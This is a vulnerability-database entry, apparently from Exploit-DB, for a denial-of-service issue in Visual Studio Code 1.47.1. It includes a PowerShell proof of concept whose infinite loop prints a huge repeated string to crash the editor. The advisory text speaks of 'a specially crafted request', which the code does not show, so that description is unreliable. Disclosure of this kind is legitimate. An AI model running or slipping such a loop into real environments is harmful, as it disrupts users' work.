Visual Studio Code 1.47.1 - Denial of Service (Poc)

vendor:

Visual Studio Code

by:

H.H.A.Ravindu Priyankara

7.5

CVSS

HIGH

Denial of Service(DOS)

400

CWE

Product Name: Visual Studio Code

Affected Version From: 1.47.1

Affected Version To: 1.47.1

Patch Exists: YES

Related CWE: N/A

CPE: a:microsoft:visual_studio_code

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

Visual Studio Code 1.47.1 – Denial of Service (Poc)

A denial of service vulnerability exists in Visual Studio Code 1.47.1. An attacker can send a specially crafted request to the application, which will cause the application to crash.

Mitigation:

Upgrade to the latest version of Visual Studio Code.

Source

Exploit-DB raw data:

# Exploit Tittle: Visual Studio Code 1.47.1 - Denial of Service (Poc)
# Exploit Author: H.H.A.Ravindu Priyankara
# Category: Denial of Service(DOS)
# Tested Version:1.47.1
# Vendor: Microsoft
# Software Download Link:https://code.visualstudio.com/updates/

Write-Host "
  *                                                                                                           *
    *-------------------------------------------------------------------------------------------------------*
    |                                                                                                       |
    |" -ForegroundColor Yellow -NoNewline; Write-Host " Exploit Tittle :-" -ForegroundColor Green -NoNewline; Write-Host "  Visual Studio Code (VS Code) Denial of Service               " -ForegroundColor Cyan -NoNewline; Write-Host "                      |
    |                                                                                                       |
    |" -ForegroundColor Yellow -NoNewline; Write-Host " Author         :-" -ForegroundColor Green -NoNewline; Write-Host "  H.H.A.Ravindu.Priyankara  " -ForegroundColor Cyan -NoNewline; Write-Host "                                                         |
    |                                                                                                       |
    |" -ForegroundColor Yellow -NoNewline; Write-Host " Github         :-" -ForegroundColor Green -NoNewline; Write-Host "  https://github.com/Ravindu-Priyankara " -ForegroundColor Cyan -NoNewline; Write-Host "                                             |
    |                                                                                                       |
    |" -ForegroundColor Yellow -NoNewline; Write-Host " Youtube        :-"-ForegroundColor Green -NoNewline; Write-Host "  https://www.youtube.com/channel/UCKD2j5Mbr15RKaXBSIXwvMQ " -ForegroundColor Cyan -NoNewline; Write-Host "                          |
    |                                                                                                       |
    |" -ForegroundColor Yellow -NoNewline; Write-Host " Linkedin       :-"-ForegroundColor Green -NoNewline; Write-Host "  https://www.linkedin.com/in/ravindu-priyankara-b77753209/ " -ForegroundColor Cyan -NoNewline; Write-Host "                         |
    *-------------------------------------------------------------------------------------------------------*"-ForegroundColor Yellow 

[string]$Userinpts = Read-Host -Prompt "Enter Run or Stop:-"
if ($Userinpts -eq "Run") {
    Write-Output "Yeah I Know"
    while ($True) {
        $name = "AAAAAAA"
        $name * 1000000
    }
    #or
    #$name = "AAAAAAA"
    #$name * 1000000
}
if ($Userinpts -eq "Stop") {
    exit
}

#==========================================================
#==================== solution ============================ 
#==========================================================

#Update Your Visual Studio Code Application
#    1.47.1 version ==> 1.56.0 version

#==========================================================